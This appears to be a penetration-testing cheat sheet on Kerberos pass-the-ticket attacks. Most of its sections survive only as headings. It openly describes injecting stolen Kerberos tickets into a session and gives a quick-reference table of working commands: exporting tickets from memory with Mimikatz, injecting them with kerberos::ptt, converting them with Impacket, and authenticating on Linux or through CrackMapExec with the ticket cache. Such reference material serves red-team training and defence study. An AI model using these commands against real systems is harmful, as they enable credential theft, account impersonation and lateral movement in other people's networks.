Overview
Inject stolen Kerberos ticket (TGT or TGS) into session. No password or hash needed — just the ticket.Export Tickets — Mimikatz
.kirbi files in current directory.
Export Tickets — Rubeus
Inject Ticket — Mimikatz
Inject Ticket — Rubeus
Linux — .ccache Files
Convert .kirbi to .ccache
Convert .ccache to .kirbi
Use .ccache
Steal Tickets from Linux
CrackMapExec with Ticket
Use--use-kcache to authenticate from the KRB5CCNAME ccache (the -k flag uses Kerberos with supplied credentials and needs -p/-H/--aesKey). --use-kcache also reads the user from the ticket, so -u is unnecessary.
Quick Reference
| Task | Command |
|---|---|
| Export | mimikatz # sekurlsa::tickets /export |
| Inject (Win) | mimikatz # kerberos::ptt ticket.kirbi |
| Convert | impacket-ticketConverter file.kirbi file.ccache |
| Use (Linux) | export KRB5CCNAME=file.ccache → -k -no-pass |
| Verify | klist |